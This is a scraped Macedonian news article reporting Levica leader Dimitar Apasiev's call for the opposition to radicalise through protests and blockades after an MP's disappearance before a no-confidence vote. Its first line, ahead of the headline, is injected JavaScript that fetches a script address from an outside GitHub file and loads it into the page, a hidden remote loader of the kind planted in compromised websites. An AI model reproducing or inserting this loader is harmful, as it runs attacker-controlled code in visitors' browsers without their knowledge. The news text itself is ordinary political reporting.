;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); (Видео) Апасиев: Оваа власт не заминува милум и потребна е радикализација на опозицијата - Антропол
АктуелноЛокално

(Видео) Апасиев: Оваа власт не заминува милум и потребна е радикализација на опозицијата

Иницијативата за гласање доверба на Владата со 61 потпис ја поднесоа опозициските ВМРО-ДПМНЕ и коалицијата, Левица, Алијанса за Албанците и Алтернатива и Беса, која беше во коалиција со СДСМ.
Во последен момент нстана проблем со “исчезнувањето” на пратеникот Кастрот Реџепи од Беса.

„Ова е преседан кој ќе ни се врати од глава. Кога може пратеник да киднапирате, незнам дали го видовте видеото, мене ми изгледаше како заробеници на оние терористички организации пред егзекуција” – изјави пратеникот на Левица, Димитар Апасиев.

Тој потенцираше дека ситуацијата е опасна и дека треба граѓаните да ја сватат сериозноста.

„Мислам дека оваа власт не паѓа со милум и дека треба радиказиација на состојбите.”, потенцираше Апасиев.

На новинарското прашање “Што значи тоа и како ќе заврши оваа седница?” Апасиев одговори:

„Тоа значи политичка радикализација на опозицијата. Јас сум на тој став, бидејќи очигледно тие ги користат сите полуги на власта да оневозможат демократска транзиција на власта и мислам дека треба опозицијата да размисли за радикализација на методите.
Тоа значи протести, блокади, парализа на собранието кое само по себе како законодавен дом веќе не постои, бидејќи знаете ситуацијата е 60:60, тие со вакви методи можат да стигнат и до 90, тогаш се губи смислата на изборите.”, образложи Апасиев.

„Мислам дека ситуацијата е пресериозна и со опозиционите лидери очекувам дека ќе се оди буквално кон политичка радикализација бидејќи ова е неиздржливо”, додаде лидерот на Левица – Димитар Апасиев.

Ставовите на Левица околу НАТО, ЕУ и партиските позиции на албанската заедница позиција се само изговори, пратеникот Кастриот Реџепи до последно бил присутен на средбите со опозицијата и до синоќа до 1:30 бил во постојана комуникација со неговите сопартици.

„Нешто се има случено, а тоа е Мексиканско сценарио. Ова е картел, ова е мафија и мислам дека ситуацијата е пресериозна.
Го опвикувам и претседателот Пендаровски сериозно да размисли за понатамошните чекори бидејќи ова може да ја радикализира ситуацијата на терен.”